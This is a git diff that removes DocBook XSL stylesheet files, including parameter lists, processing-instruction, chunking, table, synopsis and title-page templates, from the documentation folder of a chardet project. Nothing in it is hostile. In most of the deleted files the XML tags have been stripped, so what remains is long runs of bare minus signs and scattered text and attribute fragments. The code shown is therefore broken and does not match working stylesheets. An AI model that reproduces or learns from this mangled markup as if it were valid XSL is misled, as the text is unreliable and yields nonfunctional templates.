-&olink.outline.ext; -&olink.pubid; -&olink.sysid; -&olink.resolver; - - -Bibliography -&biblioentry.item.separator; -&bibliography.collection; -&bibliography.numbered; - - -Glossary -&glossterm.auto.link; -&firstterm.only.link; -&glossary.collection; -&glossentry.show.acronym; - - -Miscellaneous -&formal.procedures; -&formal.title.placement; -&runinhead.default.title.end.punct; -&runinhead.title.end.punct; -&show.comments; -&show.revisionflag; -&shade.verbatim; -&shade.verbatim.style; -&punct.honorific; -&segmentedlist.as.table; -&variablelist.as.table; -&tex.math.in.alt; -&tex.math.file; -&tex.math.delims; -&pixels.per.inch; -&points.per.em; -&use.svg; -&use.role.as.xrefstyle; -&menuchoice.separator; -&menuchoice.menu.separator; -&default.float.class; -&footnote.number.format; -&table.footnote.number.format; -&footnote.number.symbols; -&table.footnote.number.symbols; -&xref.with.number.and.title; -&xref.label-page.separator; -&xref.label-title.separator; -&xref.title-page.separator; -&insert.xref.page.number; - - -Graphics -&graphic.default.extension; -&default.image.width; -&nominal.image.width; -&nominal.image.depth; -&use.embed.for.svg; -&make.graphic.viewport; -&preferred.mediaobject.role; -&use.role.for.mediaobject; -&ignore.image.scaling; - - -Chunking -&chunker.output.cdata-section-elements; -&chunker.output.doctype-public; -&chunker.output.doctype-system; -&chunker.output.encoding; -&chunker.output.indent; -&chunker.output.media-type; -&chunker.output.method; -&chunker.output.omit-xml-declaration; -&chunker.output.standalone; -&saxon.character.representation; -&html.ext; -&html.extra.head.links; -&root.filename; -&base.dir; -&generate.manifest; -&manifest; -&manifest.in.base.dir; -&chunk.toc; -&chunk.tocs.and.lots; -&chunk.section.depth; -&chunk.first.sections; -&chunk.quietly; -&navig.graphics; -&navig.graphics.extension; -&navig.graphics.path; -&navig.showtitles; - - -Profiling - -Following parameters can be used for attribute value based -profiling of your document. For more info about profiling look at -http://docbook.sourceforge.net/projects/xsl/doc/tools/profiling.html. - -&profile.arch; -&profile.condition; -&profile.conformance; -&profile.lang; -&profile.os; -&profile.revision; -&profile.revisionflag; -&profile.role; -&profile.security; -&profile.userlevel; -&profile.vendor; -&profile.attribute; -&profile.value; -&profile.separator; - - -HTML Help -&htmlhelp.encoding; -&htmlhelp.autolabel; -&htmlhelp.chm; -&htmlhelp.default.topic; -&htmlhelp.display.progress; -&htmlhelp.hhp; -&htmlhelp.hhc; -&htmlhelp.hhk; -&htmlhelp.hhp.tail; -&htmlhelp.hhp.window; -&htmlhelp.hhp.windows; -&htmlhelp.enhanced.decompilation; -&htmlhelp.enumerate.images; -&htmlhelp.force.map.and.alias; -&htmlhelp.map.file; -&htmlhelp.alias.file; -&htmlhelp.hhc.section.depth; -&htmlhelp.hhc.show.root; -&htmlhelp.hhc.folders.instead.books; -&htmlhelp.hhc.binary; -&htmlhelp.hhc.width; -&htmlhelp.title; -&htmlhelp.show.menu; -&htmlhelp.show.toolbar.text; -&htmlhelp.show.advanced.search; -&htmlhelp.show.favorities; -&htmlhelp.button.hideshow; -&htmlhelp.button.back; -&htmlhelp.button.forward; -&htmlhelp.button.stop; -&htmlhelp.button.refresh; -&htmlhelp.button.home; -&htmlhelp.button.home.url; -&htmlhelp.button.options; -&htmlhelp.button.print; -&htmlhelp.button.locate; -&htmlhelp.button.jump1; -&htmlhelp.button.jump1.url; -&htmlhelp.button.jump1.title; -&htmlhelp.button.jump2; -&htmlhelp.button.jump2.url; -&htmlhelp.button.jump2.title; -&htmlhelp.button.next; -&htmlhelp.button.prev; -&htmlhelp.button.zoom; -&htmlhelp.remember.window.position; -&htmlhelp.window.geometry; -&htmlhelp.use.hhk; -&htmlhelp.only; - - -Eclipse Help Platform -&eclipse.autolabel; -&eclipse.plugin.name; -&eclipse.plugin.id; -&eclipse.plugin.provider; - - -Localization -&l10n.gentext.language; -&l10n.gentext.default.language; -&l10n.gentext.use.xref.language; - - -The Stylesheet - -The param.xsl stylesheet is just a wrapper -around all these parameters. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/pi.xsl b/chardet/docs/docbook/xsl/html/pi.xsl deleted file mode 100644 index 6c77d47..0000000 --- a/chardet/docs/docbook/xsl/html/pi.xsl +++ /dev/null @@ -1,207 +0,0 @@ - - - - - - - - - - - - - - - - - filename - - - - - - - - - - - - filename - - - - - - - - - - - - - - - - - - - - - - dir - - - - - - - - - - - - - - / - - - - / - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - -
    - - - - - -
    -
    -
    - - - - - - No cmdsynopsis elements matched dbcmdlist PI, perhaps it's nested too deep? - - - -
    - - - -
    -
    - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - -
    - - - - - -
    -
    -
    - - - - - - No funcsynopsis elements matched dbfunclist PI, perhaps it's nested too deep? - - - -
    - - - -
    -
    - - - -
    diff --git a/chardet/docs/docbook/xsl/html/profile-chunk-code.xsl b/chardet/docs/docbook/xsl/html/profile-chunk-code.xsl deleted file mode 100644 index d532913..0000000 --- a/chardet/docs/docbook/xsl/html/profile-chunk-code.xsl +++ /dev/null @@ -1,562 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - Computing chunks... - - - - - Fast chunking requires exsl:node-set(). - Using "slow" chunking. - - - - - - - - - - - - - -
    - -
    -
    - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Error - - is not a chunk! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ID ' - - ' not found in document. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -toc - - - - - - - - - - -

    - -

    - -
    -
    -
    - -
    -
    - - - -
    -
    -
    - - - - - - - - - - - - - - - - - 0 - 1 - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    -
    - - - - -
    -
    -
    - - - - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/profile-chunk.xsl b/chardet/docs/docbook/xsl/html/profile-chunk.xsl deleted file mode 100644 index 36319e6..0000000 --- a/chardet/docs/docbook/xsl/html/profile-chunk.xsl +++ /dev/null @@ -1,40 +0,0 @@ - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/profile-docbook.xsl b/chardet/docs/docbook/xsl/html/profile-docbook.xsl deleted file mode 100644 index 7acf1d2..0000000 --- a/chardet/docs/docbook/xsl/html/profile-docbook.xsl +++ /dev/null @@ -1,382 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No template matches - - - in - - - . - - - - < - - > - - </ - - > - - - - - - - - - white - black - #0000FF - #840084 - #0000FF - - - - - - - - - - <xsl:copy-of select="$title"/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ID ' - - ' not found in document. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/profile-onechunk.xsl b/chardet/docs/docbook/xsl/html/profile-onechunk.xsl deleted file mode 100644 index 0a03a12..0000000 --- a/chardet/docs/docbook/xsl/html/profile-onechunk.xsl +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - - - - - - - - - - -1 - - - - # - - - - - - diff --git a/chardet/docs/docbook/xsl/html/qandaset.xsl b/chardet/docs/docbook/xsl/html/qandaset.xsl deleted file mode 100644 index f0d38df..0000000 --- a/chardet/docs/docbook/xsl/html/qandaset.xsl +++ /dev/null @@ -1,360 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1% - - - - - - -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - -
    -
    - - -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - -
    -
    - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/refentry.xsl b/chardet/docs/docbook/xsl/html/refentry.xsl deleted file mode 100644 index 72cf40f..0000000 --- a/chardet/docs/docbook/xsl/html/refentry.xsl +++ /dev/null @@ -1,257 +0,0 @@ - - - - - - - - -
    - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    - -

    -
    - - -
    - - -
    -
    -
    -
    - - - - - - -
    -
    - - - - - - - - - - - - - ( - - ) - - - - - - - - - - - -
    - - - -

    - - - -

    -
    - -

    - - - - - - - - -

    -
    -
    -

    - -

    -
    -
    - - - - - , - - - - - - - em-dash - - - - - - - - - - -

    - - - - : - - - -

    -
    - - -
    - -

    - - - - - - - - - - -

    - -
    -
    - - - - - - - - - - - -
    - - - - - -
    -
    - - - - - - - 6 - - - - - - - - - - - - -

    - -

    -
    - - - -

    - -

    -
    - - - -

    - -

    -
    - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/sections.xsl b/chardet/docs/docbook/xsl/html/sections.xsl deleted file mode 100644 index c3cd7da..0000000 --- a/chardet/docs/docbook/xsl/html/sections.xsl +++ /dev/null @@ -1,435 +0,0 @@ - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - -
    -
    - - - - - - -
    - - - - - - - - - - - - - - - - - -
    -
    - - - - - - -
    - - - - - - - - - - - - - - - - - -
    -
    - - - - - - -
    - - - - - - - - - - - - - - - - - -
    -
    - - - - - - -
    - - - - - - - - - - - - - - - - - -
    -
    - - - - - - -
    - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - clear: both - - - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - 1 - - - - - - - 1 - 2 - 3 - 4 - 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - diff --git a/chardet/docs/docbook/xsl/html/synop.xsl b/chardet/docs/docbook/xsl/html/synop.xsl deleted file mode 100644 index ab4c480..0000000 --- a/chardet/docs/docbook/xsl/html/synop.xsl +++ /dev/null @@ -1,1363 +0,0 @@ - - -]> - - - - - - - - - - - -
    -

    - - -

    -
    -
    - - -
    - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - ( - - ) - -   - - - - - - - - - - - - -

    - - ( - - ) - - - -

    -
    - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    - - -
    - -
    -

    -
    - - - - - ( - - - - - - - - - - - - - - - - ) - ; - - - - ... - ) - ; - - - - - - - , - - - ) - ; - - - - - - - - - - - - - - - - - - -
    - - ; -
    - - - - - - - - - - - - - - - - - - - - - - -
    - -
     
    - - - - padding-bottom: 1em - - -
    -
    -
    - - - - - ( - - - - - - - - - - - - - - - - - ) - ; - -   - - - - - ... - ) - ; - -   - - - - - - - - , - - - ) - ; - - - -   - - - - - - - - - - - - - - - - - - - - - -   - - - - - - - - - - - - - -   - - - - - ; - - - - - - - - - - - - - - - - - - - - - ( - - ) - ; - - - - - - -

    - -

    -
    - - - - - ( - - - - - - - - - - - - - - - - void) - ; - - - - ... - ) - ; - - - - - - - , - - - ) - ; - - - - - - - - - - - - - - - - - - - ( - - ) - - - - - - - - - padding-bottom: 1em - - - - - - - - - - - -
    - -
     
    -
    - - - - - ( - - - - - - - - - - - - - - - - - void) - ; - -   - - - - - ... - ) - ; - -   - - - - - - - -   - - - - - - - - -   - - - - - - - , - - - ) - ; - - - - - - - - - - - - - - - - - - - - - - ( - - ) - - - - -java - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Unrecognized language on - - : - - - - - - - - - - - -
    -
    -
    - - - - - -
    -    
    -    
    -       extends
    -      
    -      
    -        
    -      -
    -
    - - implements - - -
    -      -
    -
    - - throws - - -  { -
    - - } -
    -
    - - - - - - - - - , - - - - - - - - - - - - - -   - - - - - - , - - - - - - - - - , - - - - - - - - - , - - - - - - - - - -    - - - ; - - - - - - - -   - - - - - - -   - - - - - - - - - - - - - void  - - - - - - - - - - - 0 - - , -
    - - -   - - - -
    - - - -
    - - - - - - - - - - - - -    - - - - - - - - - - - - - - ( - - - - ) - -
    -     throws  - -
    - ; -
    - -
    - - - - -
    -    
    -    
    -      : 
    -      
    -      
    -        
    -      -
    -
    - - implements - - -
    -      -
    -
    - - throws - - -  { -
    - - } -
    -
    - - - - - - - - , - - - - - - - - - -   - - - - - - , - - - - - - - - - , - - - - - - - - - , - - - - - - - - - -    - - - ; - - - - - - - -   - - - - - - -   - - - - - - - - - - - - - void  - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - -    - - - - - - - - - - ( - - ) - -
    -     throws  - -
    - ; -
    - -
    - - - - -
    -    interface 
    -    
    -    
    -      : 
    -      
    -      
    -        
    -      -
    -
    - - implements - - -
    -      -
    -
    - - throws - - -  { -
    - - } -
    -
    - - - - - - - - , - - - - - - - - - -   - - - - - - , - - - - - - - - - , - - - - - - - - - , - - - - - - - - - -    - - - ; - - - - - - - -   - - - - - - -   - - - - - - - - - - - - - void  - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - -    - - - - - - - - - - ( - - ) - -
    -     raises( - - ) -
    - ; -
    - -
    - - - - -
    -    package 
    -    
    -    ;
    -    
    - - - @ISA = ( - - ); -
    -
    - - -
    -
    - - - - - - - - , - - - - - - - - - -   - - - - - - , - - - - - - - - - , - - - - - - - - - , - - - - - - - - - -    - - - ; - - - - - - - -   - - - - - - -   - - - - - - - - - - - - - void  - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - sub - - - { ... }; - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/table.xsl b/chardet/docs/docbook/xsl/html/table.xsl deleted file mode 100644 index 0ecd931..0000000 --- a/chardet/docs/docbook/xsl/html/table.xsl +++ /dev/null @@ -1,1101 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - -   - - - - - - - - - - - - - - - - - - - border- - - : - - - - - - ; - - - - - border- - - -width: - - ; - - - - border- - - -style: - - ; - - - - border- - - -color: - - ; - - - - - - - - - - - Error: CALS tables must specify the number of columns. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 100% - - - - - 0 - - - - border-collapse: collapse; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - border-collapse: collapse; - - - - - - - - - - - - - - - - - border-collapse: collapse; - - - - - - - - - - - border-collapse: collapse; - - - - - - - - - - - border-collapse: collapse; - - - - - - - - - - - - - - - - - border-collapse: collapse; - - - - - - 0 - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - 100% - - - - - - - - - - - - - - - - - - - - - - - - No convertLength function available. - - - - - - - - - - - - - - - - - - - - - - - - - - No adjustColumnWidths function available. - - - - - - - - - - - - - - - - - - - - -
    - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - th - th - td - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - - - : - - - - - - - - 0: - - - - - - - - - - - - - - - 0 - - : - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - 1 - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - diff --git a/chardet/docs/docbook/xsl/html/task.xsl b/chardet/docs/docbook/xsl/html/task.xsl deleted file mode 100644 index d3fabda..0000000 --- a/chardet/docs/docbook/xsl/html/task.xsl +++ /dev/null @@ -1,69 +0,0 @@ - - - - - - - - - - - - - - - - before - - - - - - - - -
    - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/titlepage.templates.xml b/chardet/docs/docbook/xsl/html/titlepage.templates.xml deleted file mode 100644 index 42c9452..0000000 --- a/chardet/docs/docbook/xsl/html/titlepage.templates.xml +++ /dev/null @@ -1,659 +0,0 @@ - - - - - - - - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <hr/> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="set" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <hr/> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="book" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <hr/> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="part" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<t:titlepage t:element="partintro" t:wrapper="div"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="reference" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <hr/> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="refentry" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> -<!-- uncomment this if you want refentry titlepages - <title t:force="1" - t:named-template="refentry.title" - param:node="ancestor-or-self::refentry[1]"/> ---> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator/> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - - <t:titlepage t:element="dedication" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title - t:force="1" - t:named-template="component.title" - param:node="ancestor-or-self::dedication[1]"/> - <subtitle/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="preface" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="chapter" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="appendix" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="section" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <xsl:if test="count(parent::*)='0'"><hr/></xsl:if> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<t:titlepage t:element="sect1" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <xsl:if test="count(parent::*)='0'"><hr/></xsl:if> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<t:titlepage t:element="sect2" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <xsl:if test="count(parent::*)='0'"><hr/></xsl:if> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<t:titlepage t:element="sect3" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <xsl:if test="count(parent::*)='0'"><hr/></xsl:if> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<t:titlepage t:element="sect4" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <xsl:if test="count(parent::*)='0'"><hr/></xsl:if> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<t:titlepage t:element="sect5" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <xsl:if test="count(parent::*)='0'"><hr/></xsl:if> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<t:titlepage t:element="simplesect" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title/> - <subtitle/> - <corpauthor/> - <authorgroup/> - <author/> - <othercredit/> - <releaseinfo/> - <copyright/> - <legalnotice/> - <pubdate/> - <revision/> - <revhistory/> - <abstract/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - <xsl:if test="count(parent::*)='0'"><hr/></xsl:if> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="bibliography" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title - t:force="1" - t:named-template="component.title" - 